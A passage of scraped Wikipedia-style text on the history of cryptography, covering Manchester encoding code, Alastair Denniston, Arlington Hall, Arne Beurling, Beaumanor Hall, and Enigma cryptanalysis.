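        levels.extend((0, 1) if b else (1, 0))  # 1 -> rising edge, 0 -> falling edge
    return levels

def manchester_decode(levels: list[int]) -> list[int]:
    """Recover data bits from half-bit levels, rejecting invalid symbols."""
    bits = []
    for i in range(0, len(levels), 2):
        pair = (levels[i], levels[i + 1])
        if pair == (0, 1):
            bits.append(1)
        elif pair == (1, 0):
            bits.append(0)
        else:
            raise ValueError("no mid-bit transition: not a Manchester symbol")
    return bits

data = [1, 0, 1, 1, 0]
assert manchester_decode(manchester_encode(data)) == data
```

The guaranteed mid-bit transition is what lets the receiver synchronise itself to the phase of the received signal, at the cost of doubling the symbol rate.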
https://en.wikipedia.org/wiki/Node-to-node_data_transfer
TransmitorTransmissionmay refer to:
https://en.wikipedia.org/wiki/Transmission_(disambiguation)
CommanderAlexander"Alastair"Guthrie DennistonCBCMGCBERNVR(1 December 1881 – 1 January 1961) was a Scottish codebreaker, deputy head of theGovernment Code and Cypher School(GC&CS) andhockeyplayer.[1][2]Denniston was appointed operational head of GC&CS in 1919 and remained so until February 1942.[3][4] Denniston was born inGreenock,Renfrewshire, the son of a medical practitioner.[3]He studied at theUniversity of Bonnand theUniversity of Paris.[3]Denniston was a member of the Scottish Olympic hockey team in1908and won a bronze medal. He played as a half-back, and his club team was listed as Edinburgh. In the IOC's official 1908 report, he is listed as Dennistoun rather than Denniston.[2] In 1914, Denniston helped formRoom 40in the Admiralty, an organisation responsible for intercepting and decrypting enemy messages. In 1917, he married a fellow Room 40 worker, Dorothy Mary Gilliat.[3] After theFirst World War, Denniston, recognising the strategic importance of codebreaking, kept the Room 40 activity functioning.[5]: 8Room 40 was merged with its counterpart in the Army,MI1b, in 1919, renamed the Government Code and Cypher School (GC&CS) in 1920 and transferred from the Navy to the Foreign Office. Denniston was chosen to run the new organisation.[6] With the rise ofHitler, Denniston began making preparations. Following the practice of his superiors at Room 40, he contacted scientists from Oxford and Cambridge (includingAlan TuringandGordon Welchman) asking if they would be willing to serve if war broke out.Bletchley Parkwas chosen by MI6 chief AdmiralHugh Sinclairas the location for the codebreaking effort because it was at arail junctionon the west coast main line 47 miles (76 km) north of London, with good rail connections to Oxford and Cambridge. Sinclair acquired the Bletchley Park property and Denniston was assigned to prepare the site and design the huts to be built on the grounds. The GC&CS moved to the new location in August 1939, just before theInvasion of Polandand the start of theSecond World War. Its name changed toGovernment Communications Headquarters(GCHQ).[5]: 9–10 On 26 July 1939, five weeks before the outbreak of war, Denniston was one of three Britons (along withDilly Knoxand Humphrey Sandwith) who participated in the trilateral Polish-French-British conference held in theKabaty Woodssouth ofWarsaw, at which thePolishBiuro Szyfrów(Cipher Bureau) initiated the French and British into thedecryptionofGermanmilitaryEnigmaciphers.[7] Denniston remained in command until he was admitted to hospital in June 1940 for abladder stone. Although ill, he flew to the United States in 1941 to make contact with American cryptographers includingWilliam Friedman. Denniston returned to Bletchley Park for a while but moved to London later in 1941 to work on diplomatic traffic.[5]: 10 Despite his knowledge of the success of Polish cryptologists against Enigma, Denniston shared the general pessimism about the prospects of breaking the more complex Naval Enigma encryption until as late as the summer of 1940, having told the Head of Naval Section at Bletchley: "You know, the Germans don't mean you to read their stuff, and I don't expect you ever will."[8]The advent ofBanburismusshortly afterwards showed his pessimism to be misplaced. 
In October 1941, the originator of the technique,Alan Turing, along with fellow senior cryptologistsGordon Welchman,Stuart Milner-BarryandHugh Alexanderwrote to Churchill, over the head of Denniston, to alert Churchill to the fact that a shortage of staff at Bletchley Park was preventing them from deciphering many messages. An addition of personnel, small by military standards, could make a big difference to the effectiveness of the fighting effort. The slow response to previous requests had convinced them that the strategic value of their work was not understood in the right quarters. In the letter, there was praise for the 'energy and foresight' of CommanderEdward Travis.[9] Churchill reacted to the letter immediately, ordering "Action this day". Resources were transferred as fast as possible.[10] In February 1942, GC&CS was reorganised. Travis, Denniston's second in command and chief of the Naval section, succeeded Denniston at Bletchley Park, overseeing the work on military codes and ciphers. When Travis took over, he "presided over an administrative revolution which at last brought the management of Intelligence into line with its mode of production".[9] Denniston and his wife had two children: a son and daughter. Their son,Robin, was educated atWestminster SchoolandChrist Church, Oxford. After Alastair's demotion and resulting decreased income, Robin's school fees were paid by benefactors. However, the Dennistons' daughter had to leave her school due to lack of funds.[11] Denniston retired in 1945, and later taught French and Latin inLeatherhead.[3] William Friedman, the American cryptographer who broke the JapanesePurple code, later wrote to Denniston's daughter: "Your father was a great man in whose debt all English-speaking people will remain for a very long time, if not forever. That so few should know exactly what he did ... is the sad part."[5]: 11 Robin distinguished himself as a publisher. In 2007, he publishedThirty Secret Years, abiographyof his father that consolidated his reputation in GCHQ history.[11] In the 2014 filmThe Imitation Game, he is portrayed byCharles Dance.[15]
https://en.wikipedia.org/wiki/Alastair_Denniston
Arlington Hall(also calledArlington Hall Station) is a historic building inArlington, Virginia. Originally it was a girls' school and later the headquarters of theUnited States Army'sSignal Intelligence Service(SIS)cryptographyoperations duringWorld War II. The site houses theGeorge P. Shultz National Foreign Affairs Training Centerand theArmy National Guard'sHerbert R. Temple Jr.Readiness Center. It is located onArlington Boulevard(U.S. Route 50) between S. Glebe Road (State Route 120) and S. George Mason Drive. Arlington Hall was founded in 1927 as a privatepost-secondary women's educational institution, which, by 1941, was on a 100-acre (0.40 km2) campus and was called the Arlington Hall Junior College for Women. The school had financial problems in the 1930s and eventually became a non-profit institution in 1940.[1]On June 10, 1942, theU.S. Armytook possession of the facility under the War Powers Act for use by itsSignals Intelligence Service.[2] During World War II, Arlington Hall was in many respects similar toBletchley ParkinBuckinghamshire, England(although BP also covered naval codes) and was one of only two primarycryptographyoperations inWashington(the other was theNaval Communications Annex, which was also housed ina commandeered private girls' school). Arlington Hall concentrated its efforts on theJapanesesystems (includingPURPLE) while Bletchley Park concentrated on European combatants. Initially work was on Japanese diplomatic codes, asJapanese army codeswere not solved until April 1943; in September 1943, with success on the Army codes, they were put underSolomon Kullbackin a separate branch, B-II, with other mainly diplomatic work underFrank Rowlettin B-III (which also had the Bombes and Rapid Analytical Machinery). The third branch, B-I, translated Japanese decrypts.[3] The Arlington Hall effort was comparable in influence to other Anglo-AmericanSecond World War-era technological efforts, such as the cryptographic work at Bletchley Park, the Naval Communications Annex, the development of sophisticated microwaveradaratMassachusetts Institute of Technology(MIT)'sRadiation Lab, and theManhattan Project's development of theatomic bombsused onHiroshimaandNagasakiin August 1945, which abruptly ended the war and later initiated further development ofnuclear weapons. After World War II, the "Russian Section" at Arlington Hall expanded. Work on diplomatic messages benefited from additional technical personnel and new analysts—among them Samuel Chew, who had focused onJapan, and linguistMeredith Gardner, who had worked on bothGermanandJapanesemessages. Chew had considerable success at defining the underlying structure of the codedRussiantexts. Gardner and his colleagues began analytically reconstructing theKGB(theSoviet Union's Committee for State Security) spy agency codebooks. Late in 1946, Gardner broke the codebook's "spell table" for encoding English letters. With the solution of the spell table, SIS could read significant portions of messages which included English names and phrases. Gardner soon found himself reading a 1944 message listing prominent atomic scientists, including several with theManhattan Project. Efforts to decipher Soviet codes continued under the classified and caveatedVenona project. Another problem soon arose—that of determining how and to whom to disseminate the extraordinary information Gardner was developing. 
SIS's reporting procedures did not seem appropriate because the decrypted messages could not even be paraphrased for Arlington Hall's regular intelligence customers without divulging their source. By 1946, SIS knew nothing about the federal grand jury impaneled inManhattan, New Yorkto probe the espionage and disloyalty charges stemming from the defections ofElizabeth Bentleyand others from Soviet intelligence, so no one in the U.S. Government was aware that evidence against the Soviets was suddenly developing on two adjacent tracks. In late August or early September 1947, theFederal Bureau of Investigation(FBI) was informed that the Army Security Agency had begun to break into Soviet espionage messages. By 1945, the Soviets had penetrated Arlington Hall with the placement ofBill Weisband, who worked there for several years. The government's knowledge of his treason apparently was not revealed until its publication in a 1990 book co-authored by a high-level KGB defector. Arlington Hall came under the aegis of theNational Security Agencyafter the agency was created in 1952. From 1945 to 1977, Arlington Hall was the headquarters of theUnited States Army Security Agencyand, for a brief time in late 1948, of the newly formedUnited States Air Force Security Service(USAFSS), until it moved toBrooks Air Force BaseinSan Antonio, Texas. When theUnited States Army Intelligence and Security Command(INSCOM) was commissioned at Arlington Hall on January 1, 1977, INSCOM absorbed the functions of the Army Security Agency into its operations. INSCOM remained at Arlington Hall until the summer of 1989, when INSCOM left for Fort Belvoir,Virginia. Beginning in January 1963, Arlington Hall served as the premier facility of the newly createdDefense Intelligence Agency(DIA).[4]In 1984, DIA departed Arlington Hall for its newheadquartersonJoint Base Anacostia–Bolling(the formerBolling Air Force BaseinWashington, D.C.), a move that was complete by December 1984.[5][6] Arlington Hall was also home in the late 1950s and early 1960s to theArmed Services Technical Information Agency(ASTIA) which disseminated classified research to defense contractors. In 1989, theU.S. Department of Defensetransferred the eastern portion of Arlington Hall to theDepartment of State. In October 1993, this portion of the site became theNational Foreign Affairs Training Centerwhen the State Department'sForeign Service Institute(FSI) moved there[7]from its prior location in the Mayfair Building in Washington, D.C. The National Foreign Affairs Training Center was renamed as theGeorge P. Shultz National Foreign Affairs Training Centerin a ceremony held on May 29, 2002, named forGeorge P. Shultz, formerSecretary of the TreasuryandSecretary of State.[8] In January 2008, construction workers discovered an unexplodedCivil War-eraParrott rifleshellunderneath Arlington Hall. The shell had a length of one foot and a diameter of five inches. U.S. Armyexplosive ordnance disposaltechnicians fromFort Belvoirwere brought in to dispose of the antiquemunition.[9] TheNational Park Servicedetermined that Arlington Hall Station Historic District was eligible for inclusion on theNational Register of Historic Placeson October 7, 1988 (although it has not been officially listed).[10]The historic main building of the former girls' school now houses classrooms and administrative offices for components of theForeign Service Institute, on the campus of the George P. ShultzNational Foreign Affairs Training Center. 
The western portion of the Arlington Hall site presently houses theArmy National GuardReadiness Center, which was named forHerbert R. Temple Jr.in 2017. 38°52′03″N77°06′13″W / 38.8676°N 77.1036°W /38.8676; -77.1036
https://en.wikipedia.org/wiki/Arlington_Hall
Arne Carl-August Beurling(3 February 1905 – 20 November 1986) was aSwedishmathematicianandprofessorofmathematicsatUppsala University(1937–1954) and later at theInstitute for Advanced StudyinPrinceton, New Jersey. Beurling worked extensively inharmonic analysis,complex analysisandpotential theory. The "Beurling factorization" helped mathematical scientists to understand theWold decomposition, and inspired further work on theinvariant subspacesof linear operators andoperator algebras, e.g. Håkan Hedenmalm's factorization theorem forBergman spaces. He is perhaps most famous for single-handedly decrypting an early version of the German cipher machineSiemens and Halske T52in a matter of two weeks during 1940, using only pen and paper. This machine's cipher is generally considered to be more complicated than that of the more famousEnigma machine. Beurling's method of decrypting military telegrams between Norway and Germany worked from June 1940 right up until 1943, when the Germans changed equipment. Beurling was born on 3 February 1905 inGothenburg, Sweden, and was the son of the landowner Konrad Beurling and baroness Elsa Raab.[1]Aftergraduatingin 1924, he enrolled atUppsala University, where he received a Bachelor of Arts degree in 1926 and two years later a Licentiate of Philosophy degree.[1] Beurling was an assistant teacher at Uppsala University from 1931 to 1933.[1]He received his doctorate in mathematics in 1933 for his dissertationÉtudes sur un problème de majoration.[2]Beurling was adocentof mathematics at Uppsala University from 1933 and then professor of mathematics from 1937 to 1954.[1] In the summer of 1940 he single-handedlydecipheredandreverse-engineeredan early version of theSiemens and Halske T52, also known as theGeheimfernschreiber("secret teletypewriter"), used byNazi GermanyinWorld War IIfor sendingcipheredmessages.[3]The T52 was one of the so-called "Fish cyphers" that, using transposition, created nearly one quintillion (893,622,318,929,520,960) different variations. It took Beurling two weeks to solve the problem using pen and paper. Using Beurling's work, a device was created that enabled Sweden to decipher Germanteleprintertraffic passing through Sweden fromNorwayon a cable. In this way, Swedish authorities knew aboutOperation Barbarossabefore it occurred.[4]Since the Swedes would not reveal how this knowledge was attained, the Swedish warning was not treated as credible by the Soviets. This became the foundation for the SwedishNational Defence Radio Establishment(FRA). The cypher in theGeheimfernschreiberis generally considered to be more complex than the cypher used in the Enigma machines.[5] He was a visiting professor atHarvard Universityfrom 1948 to 1949.[6]From 1954 he was professor at theInstitute for Advanced Studyin Princeton, New Jersey,United States, where he took overAlbert Einstein's office.[7] He was thedoctoral advisorofLennart CarlesonandCarl-Gustav Esseen. Arne Beurling was first married (1936–40) to Britta Östberg (born 1907), daughter of Henrik Östberg and Gerda Nilsson. In 1950 he married Karin Lindblad (1920–2006), daughter of ironmonger Henric Lindblad and Wanja Bengtsson.[1]Karin was a distinguished Ph.D. student from Uppsala University. 
When they lived in Princeton, she worked in a biochemistry lab at Princeton University.[8]He had two children from his first marriage — Pehr-Henrik (1936–1962) and Jane (1938–1992).[1] Beurling's great-grandfather wasPehr Henrik Beurling(1758 or 1763–1806), who founded a high quality clock factory inStockholmin 1783. Arne Beurling died in 1986 and was buried atNorra begravningsplatseninSolna.[9] Beurling's prowess as a cryptanalyst is the subject of the 2005 short operaKrypto CEGbyJonas SjöstrandandKimmo Eriksson.
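The near-quintillion period quoted above can be checked arithmetically. The sketch below assumes the pin-wheel lengths generally published for the T52 (47, 53, 59, 61, 64, 65, 67, 69, 71, 73); because these lengths are pairwise coprime, the machine's overall period is simply their product.

```python
import math

# Pin-wheel lengths generally published for the Siemens and Halske T52
# (an assumption here; see published descriptions of the machine).
wheels = [47, 53, 59, 61, 64, 65, 67, 69, 71, 73]

# Pairwise coprime lengths mean the combined period is the plain product.
print(math.prod(wheels))  # 893622318929520960, the figure quoted above
```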
https://en.wikipedia.org/wiki/Arne_Beurling
Beaumanor Hallis astately homewith a park in the small village ofWoodhouseon the edge of theCharnwood Forest, near the town ofLoughboroughinLeicestershire, England. The present hall was built in 1842–1848 by architectWilliam Railtonfor the Herrick family, with previous halls dating back to the 14th century.[1][2][3]It was used during theSecond World Warfor military intelligence.[4]The hall is aGrade II* listed building.[5] It is owned byLeicestershire County Councilas a training centre, conference centre and residential facility for young people.[6] Following theNorman Conquest, the land in the area was owned byHugh d'Avranches, 1st Earl of Chester.[7]In the 13th century ownership passed to the Despenser family, who created a deer park and hunting lodge at what is now Beaumanor.[7]In 1327 the land passed toHenry de Beaumont, for whom a new house, Beau Manor, was built in 1330; Beaumont also had the nearby church built in 1338.[8][9]The house was replaced by a new construction in 1595 forSir William Herrick, a government official underElizabeth Iand later a member of parliament for Leicester.[9]The house was extensively altered around 1610, and stood until 1725, when it was replaced by a smaller house, completed in 1726.[9][10]The third hall was demolished in 1842, and the present hall built for William Herrick over a seven-year period between 1842 and 1848 by William Railton in the Jacobean style.[9]The hall was constructed by builder George Bridgart of Derby, using stone from Derbyshire quarries, primarilyDuffieldandAshover, with floors of marble fromAshford.[9]When completed, the building had cost £37,000.[11] William Perry Herrick (1794–1876), who built the present house in about 1850, was born inWolverhamptonin 1794. His father was Thomas Bainbrigge Herrick, a barrister, and his mother was Mary Perry, daughter of James Perry of Eardisley Park. William spent his childhood in his family home, Merridale House (now calledBantock House), inWolverhampton.[12]He went to Oxford and became a barrister. In 1832 his uncle, who owned Beaumanor, died, and as he had no male heirs the property was inherited by William. He also inherited Eardisley Park in 1852 when his maternal uncle James Perry died.[13]These properties and their associated landholdings made him a very wealthy man. He lived with his younger sister Mary Ann Herrick (1796–1871) at Beaumanor for many years. Mary Ann had inherited money from her mother in her own right and was known to be a great benefactor. An account of her generosity was contained in a book about Leicestershire. William also gave generously to the Anglican Church. In 1872 he paid for the construction ofSt Mark's Church, Leicesterwith some help from his sister.[15] In 1862 William married Sophia Christie (1831–1915), who was 37 years his junior and the daughter of Jonathan Henry Christie, a London barrister. The couple had no children. His sister Mary Ann, who continued to live at Beaumanor, died in 1871, and William died in 1876. He left all of his property to his wife Sophia and, on her death, to his relativeMontagu Curzon. Sophia managed the Beaumanor estate for the next 40 years and was well regarded by the tenants. She kept a fairly large number of household staff, one of whom was Elizabeth Ellerbeck (1843–1919), the housekeeper, who remained with her for over 30 years. 
Sophia died in 1915 and Beaumanor was inherited by William's relative William Montagu Curzon, who took the additional surname of Herrick in 1915 when he became owner of Beaumanor. William Montagu Curzon Herrick (1891–1945) was born in 1891 inLondon. His father was Colonel Montagu Curzon, who was named by William Herrick as his heir when his wife Sophia died.[16]In 1898, shortly after Sophia built Garatshay, which is near Beaumanor, the family moved to this residence. Montagu died in 1907 and did not gain his inheritance. His wife Esme remarried the Rev. William Arthur King, Vicar of Woodhouse, in London on 26 October 1909,[17]and the family continued to live at Garatshay. She died in 1939. Shortly after William inherited Sophia's property he marriedMaud Kathleen Cairns Plantagenet Hastings(known as Kathleen), who was the daughter of the 15th Earl of Huntingdon.[18] In 1923 a wedding was held at Beaumanor which was widely reported in the newspapers.[19]It was the marriage between Dorothy Hastings, the cousin of Kathleen, and the Queen's nephewLord Eltham. One newspaper gave a detailed description of the wedding. William and Kathleen held frequent house parties at Beaumanor, including one hosted in 1926. Until just preceding theSecond World Warin 1939, the Herrick family owned the park. The estate consisted of Beaumanor Hall and 6,500 acres of land, including several farms, Beacon Hill, the Hangingstone Rocks, St Mary in the Elms church, the vicarage house (Garats Hay), workers' houses and cottages along Forest Road and 350 acres (1.4 km²) ofparkland.[21] In 1939 theWar Officerequisitioned the estate, including Garats Hay, and the vicar moved to a cottage in the village. The park became a secretlistening stationwhere encrypted enemy signals (Morse code) were intercepted and sent to the famous Station X atBletchley Park(bymotorcycleevery day) for decoding. Beaumanor Park was to be the home of the War Office 'Y' Group for the duration of the war. After the war (1945) the estate passed back to the Herrick family, and on the death of William Montague Curzon-Herrick, the Beaumanor estate passed to Lt. Col. Assheton Penn Curzon Howe Herrick, who in 1946, for financial reasons (death duties, etc.), decided to dispose of his assets.[21]In a sale conducted atLoughborough Town Hallon 20–21 December 1946, the War Office bought both Beaumanor Hall and Garats Hay and some of the immediate surrounding grounds used during the war. From 1939 the hall itself was occupied by Number 6 Intelligence School, and the rooms inside Beaumanor Hall were used as a training centre for the Civilian Staff of thePost Office, Civil Service andMerchant Navy. TheRoyal Corps of Signals,Royal NavyandRoyal Air Forcealso had military staff trained inside the hall. The huge cellars stretching underneath the whole of the building were used as electricians' workshops. The outbuildings and stables at the side and rear of the hall were used as workshops. These housed aerial riggers, a barracks store, M T Office, transport garage workshop and the instrument mechanics' laboratory. By late 1941, most of theRoyal NavyandRoyal Air Forcemilitary personnel had left for duties at otherY-stations, and the main part of the site became the home of the Royal Signals. Military personnel were still being trained inside the hall for various tasks until the end of the war. 
In February 1942 the first of the newly trained ladies of theAuxiliary Territorial Servicearrived at Beaumanor and were billeted in outlying villages and Garats Hay hall. Beaumanor became one of the most important of the small number of strategic intercept stations, or "Y stations", intercepting enemy radio transmissions and relaying the information to "Station X", atBletchley Park, for decryption and analysis.[22]It is known that one of the first confirmations of the successfulOperation Chastisemission was received here. It is also widely rumoured that this listening post knew details of theKatyn massacreas early as 1941; however, the British government files were not released to the public, as that would have implicated surviving perpetrators. By 1943, Room 61 on the top floor of the hall was being used forRadio fingerprinting(Ackbar 13). This new technology was employed to uniquely identify the particular wireless set that was being used to send the transmissions. Special receiving sets displayed the incoming signals on a cathode-ray tube; the signals were then captured on film and developed. Light tables were then used to compare the signals in order to verify who was sending them. A civilian from military intelligence at Bletchley Park was in charge of this room. TheRadio Direction Findingrecords room was next door and kept records of the signals' exact locations of origin. In 1940 the use of the hall for all of these different functions meant that the required specially designed wireless set rooms had to be constructed in the grounds of the hall, instead of converting the existing rooms within the building for this purpose. A field to the north of the hall was chosen as the ideal location to construct the new set huts. The War Office Y Group had acquired an architect who worked as part of the local staff at Beaumanor, and he was tasked with designing the set rooms and other buildings. These were to be disguised and fitted into their surroundings by being made to look like normal outbuildings associated with a country house. This form of disguise is almost unique to Beaumanor; among other sites the military used during the war only Bomber Command Headquarters atRAF High Wycombewas disguised in this way. A twenty-acre(8.1 ha) field to the north of the hall was chosen as the appropriate site to build the required operational set rooms (huts). The huts were spaced far enough apart to avoid collateral damage should a bombing raid occur. Each hut was brick-built with blast walls, and then a disguising outer covering was put over it. The huts were disguised in different ways: one to look like a cart shed with barn (J), two to look like cottages (H&I), the fourth to look like stables (K), the fifth disguised as a glasshouse block (M), and the sixth, Hut G, as a cricket pavilion complete with a false clock tower. To give them an identity, the huts were each given a letter of the alphabet. The four huts around the perimeter of the field were lettered H, I, J and K. These huts were to be the four set rooms, which housed the wireless receivers for intercepting messages. All of the cables and aerial feeds were located in underground ducts. Each hut had a pneumatic tube for sending the handwritten, received messages to G hut via a cylinder, which was shot down the tube. This tube system was also underground and out of sight. 
In order to carefully conceal them, the other huts were given wooden exteriors and located in the wooded area to the rear of the hall on its western side. These huts were lettered A, B, C, D, E and F. The wireless listeners were uniformed women of the ATS (Auxiliary Territorial Service), who had been trained on the Isle of Man. They intercepted German and Italian messages, many of which had been enciphered onEnigma machines. It was the most difficult kind of signals intelligence gathering, because the enciphering meant that no prediction was possible. Once gathered, the intercepts were sent by motorcycle courier to Bletchley Park, for decryption. Collectively, the women who worked at Beaumanor were known as the WOYGians.[23] In the mid-1970s the hall was bought by Leicestershire County Council, developing quickly into a busy Conference and Education Centre. 52°44′10″N1°12′18″W / 52.736116°N 1.204998°W /52.736116; -1.204998
https://en.wikipedia.org/wiki/Beaumanor_Hall
Cryptanalysis of the Enigma ciphering systemenabled the westernAlliesinWorld War IIto read substantial amounts ofMorse-codedradio communications of theAxis powersthat had been enciphered usingEnigma machines. This yieldedmilitary intelligencewhich, along with that from other decrypted Axis radio andteleprintertransmissions, was given the codenameUltra. The Enigma machines were a family of portableciphermachines withrotorscramblers.[1]Good operating procedures, properly enforced, would have made the plugboard Enigma machine unbreakable to the Allies at that time.[2][3][4] The German plugboard-equipped Enigma became the principalcrypto-systemof theGerman Reichand later of other Axis powers. In December 1932 it was broken by mathematicianMarian Rejewskiat thePolish General Staff'sCipher Bureau,[5]using mathematicalpermutation grouptheory combined with French-supplied intelligence material obtained from a German spy. By 1938 Rejewski had invented a device, thecryptologic bomb, andHenryk Zygalskihad devised hissheets, to make the cipher-breaking more efficient. Five weeks before the outbreak of World War II, in late July 1939 at a conference just south ofWarsaw, the Polish Cipher Bureau shared its Enigma-breaking techniques and technology with the French and British. During the Germaninvasion of Poland, core Polish Cipher Bureau personnel were evacuated via Romania to France, where they established thePC Brunosignals intelligence station with French facilities support. Successful cooperation among the Poles, French, and British continued until June 1940, whenFrance surrenderedto the Germans. From this beginning, the BritishGovernment Code and Cypher SchoolatBletchley Parkbuilt up an extensive cryptanalytic capability. Initially the decryption was mainly ofLuftwaffe(German air force) and a fewHeer(German army) messages, as theKriegsmarine(German navy) employed much more secure procedures for using Enigma.Alan Turing, aCambridge Universitymathematician and logician, provided much of the original thinking that led to upgrading of the Polishcryptologic bombused in decrypting German Enigma ciphers. However, theKriegsmarineintroduced an Enigma version with a fourth rotor for itsU-boats, resulting in a prolonged period when these messages could not be decrypted. With the capture of cipher keys and the use of much fasterUS Navy bombes, regular, rapid reading of U-boat messages resumed. Many commentators say the flow ofUltracommunications intelligencefrom the decrypting of Enigma,Lorenz, and other ciphers shortened the war substantially and may even have altered its outcome.[6] The Enigma machines combined multiple levels of movable rotors and plug cables to produce a particularly complexpolyalphabetic substitution cipher. DuringWorld War I, inventors in several countries realised that a purely random key sequence, containing no repetitive pattern, would, in principle, make a polyalphabetic substitution cipher unbreakable.[7]This led to the development ofrotor machineswhich alter each character in theplaintextto produce theciphertext, by means of a scrambler comprising a set ofrotorsthat alter the electrical path from character to character, between the input device and the output device. This constant altering of the electrical pathway produces a very long period before the pattern—thekey sequenceorsubstitution alphabet—repeats. 
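The scrambler principle described above can be sketched in a few lines of code. The following toy model is illustrative only: it uses the rotor permutations commonly published for Enigma rotors I–III, but omits the reflector, plugboard, ring settings and notch positions (stepping here is a plain odometer), so it demonstrates only how moving rotors turn a fixed substitution into a long-period polyalphabetic one.

```python
import string

A = string.ascii_uppercase
# Permutations commonly published for Enigma rotors I-III; any three
# permutations of A-Z would serve to illustrate the principle.
ROTORS = ["EKMFLGDQVZNTOWYHXUSPAIBRCJ",
          "AJDKSIRUXBLHWTMCQGZNPYFVOE",
          "BDFHJLCPRTXVZNYEIWGAKMUSQO"]

def through(wiring: str, pos: int, idx: int) -> int:
    """Pass a contact index through one rotor standing at offset pos."""
    return (A.index(wiring[(idx + pos) % 26]) - pos) % 26

def encipher(text: str, start: tuple[int, int, int]) -> str:
    out, pos = [], list(start)
    for ch in text:
        # Simplified odometer stepping (real Enigmas stepped on ring notches,
        # with a double-stepping anomaly in the middle rotor).
        pos[2] = (pos[2] + 1) % 26
        if pos[2] == 0:
            pos[1] = (pos[1] + 1) % 26
            if pos[1] == 0:
                pos[0] = (pos[0] + 1) % 26
        idx = A.index(ch)
        for wiring, p in zip(reversed(ROTORS), reversed(pos)):
            idx = through(wiring, p, idx)  # right-hand (fast) rotor first
        out.append(A[idx])
    return "".join(out)

# The same plaintext letter leaves the scrambler differently as the rotors move:
print(encipher("AAAAA", (0, 0, 0)))
```

Because the fast rotor moves before every letter, identical plaintext letters take different electrical paths, which is exactly the long-period behaviour the text describes.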
Decrypting enciphered messages involves three stages, defined somewhat differently in that era than in modern cryptography.[8]First, there is theidentificationof the system in use, in this case Enigma; second,breakingthe system by establishing exactly how encryption takes place, and third,solving, which involves finding the way that the machine was set up for an individual message,i.e.themessage key.[9]Today, it is often assumed that an attacker knows how the encipherment process works (seeKerckhoffs's principle) andbreakingis often used forsolvinga key. Enigma machines, however, had so many potential internal wiring states that reconstructing the machine, independent of particular settings, was a very difficult task. The Enigma rotor machine was potentially an excellent system. It generated a polyalphabeticsubstitution cipher, with a period before repetition of the substitution alphabet that was much longer than any message, or set of messages, sent with the same key. A major weakness of the system, however, was that no letter could be enciphered to itself. This meant that some possible solutions could quickly be eliminated because of the same letter appearing in the same place in both the ciphertext and the putative piece of plaintext. Comparing the possible plaintextKeine besonderen Ereignisse(literally, "no special occurrences"—perhaps better translated as "nothing to report"; a phrase regularly used by one German outpost in North Africa) with a section of ciphertext, any alignment at which the same letter appears in the same position in both (aclash) can be ruled out; in the original worked example, position 2 survived this test and so was a possibility. The mechanism of the Enigma consisted of akeyboardconnected to abatteryand acurrent entry plateor wheel (German:Eintrittswalze), at the right hand end of the scrambler (usually via aplugboardin the military versions).[10]This contained a set of 26 contacts that made electrical connection with the set of 26 spring-loaded pins on the right hand rotor. The internal wiring of the core of each rotor provided an electrical pathway from the pins on one side to different connection points on the other. The left hand side of each rotor made electrical connection with the rotor to its left. The leftmost rotor then made contact with thereflector(German:Umkehrwalze). The reflector provided a set of thirteen paired connections to return the current back through the scrambler rotors, and eventually to the lampboard where a lamp under a letter was illuminated.[11] Whenever a key on the keyboard was pressed, thestepping motionwas actuated, advancing the rightmost rotor one position. Because it moved with each key pressed it is sometimes called thefast rotor. When a notch on that rotor engaged with apawlon the middle rotor, that too moved; and similarly with the leftmost ('slow') rotor. There are a huge number of ways that the connections within each scrambler rotor—and between the entry plate and the keyboard or plugboard or lampboard—could be arranged. For the reflector plate there are fewer, but still a large number of options for its possible wirings.[12] Each scrambler rotor could be set to any one of its 26 starting positions (any letter of the alphabet). For the Enigma machines with only three rotors, their sequence in the scrambler—which was known as thewheel order (WO)toAlliedcryptanalysts—could be selected from the six that are possible. Later Enigma models included analphabet ringlike a tyre around the core of each rotor. This could be set in any one of 26 positions in relation to the rotor's core. 
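The clash test from the crib example above is easy to mechanise: slide the crib along the ciphertext and discard every alignment at which any letter coincides with itself. A short sketch, with a made-up ciphertext purely for illustration:

```python
def possible_offsets(ciphertext: str, crib: str) -> list[int]:
    """Offsets at which no crib letter coincides with the ciphertext letter,
    exploiting the fact that Enigma never enciphered a letter to itself."""
    return [off
            for off in range(len(ciphertext) - len(crib) + 1)
            if all(c != p for c, p in zip(ciphertext[off:], crib))]

crib = "KEINEBESONDERENEREIGNISSE"            # the crib discussed above
ciphertext = "QWMVZKXBTREWOPDLJUYCNHAGSFIQTM"  # hypothetical intercept
print(possible_offsets(ciphertext, crib))      # alignments surviving the clash test
```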
The ring contained one or more notches that engaged with a pawl that advanced the next rotor to the left.[13] Later still, the three rotors for the scrambler were selected from a set of five or, in the case of the German Navy, eight rotors. The alphabet rings of rotors VI, VII, and VIII contained two notches which, despite shortening the period of the substitution alphabet, made decryption more difficult. Most military Enigmas also featured aplugboard(German:Steckerbrett). This altered the electrical pathway between the keyboard and the entry wheel of the scrambler and, in the opposite direction, between the scrambler and the lampboard. It did this by exchanging letters reciprocally, so that ifAwas plugged toGthen pressing keyAwould lead to current entering the scrambler at theGposition, and ifGwas pressed the current would enter atA. The same connections applied for the current on the way out to the lamp panel. To decipher German military Enigma messages, the following information would need to be known: the logical structure of the machine (unchanging); the internal settings (usually changed less frequently than external settings); and the external settings (usually changed more frequently than internal settings). Discovering the logical structure of the machine may be called "breaking" it, a one-off process except when changes or additions were made to the machines. Finding the internal and external settings for one or more messages may be called "solving"[14]– although breaking is often used for this process as well. The various Enigma models provided different levels of security. The presence of a plugboard (Steckerbrett) substantially increased the security of the encipherment. Each pair of letters that was connected together by a plugboard lead was referred to asstecker partners, and the letters that remained unconnected were said to beself-steckered.[15]In general, the unsteckered Enigma was used for commercial and diplomatic traffic and could be broken relatively easily using hand methods, while attacking versions with a plugboard was much more difficult. The British read unsteckered Enigma messages sent during theSpanish Civil War,[16]and also someItalian naval trafficenciphered early in World War II. The strength of the security of the ciphers that were produced by the Enigma machine was a product of the large numbers associated with the scrambling process. However, the way that Enigma was used by the Germans meant that, if the settings for one day (or whatever period was represented by each row of the setting sheet) were established, the rest of the messages for that network on that day could quickly be deciphered.[19] The security of Enigma ciphers did have fundamental weaknesses that proved helpful to cryptanalysts. Enigma featured the major operational convenience of beingsymmetrical(orself-inverse). This meant thatdeciphermentworked in the same way asencipherment, so that when theciphertextwas typed in, the sequence of lamps that lit yielded theplaintext. Identical setting of the machines at the transmitting and receiving ends was achieved by key setting procedures. These varied from time to time and across differentnetworks. They consisted ofsetting sheetsin acodebook[24][25]which were distributed to all users of a network, and were changed regularly. The message key was transmitted in 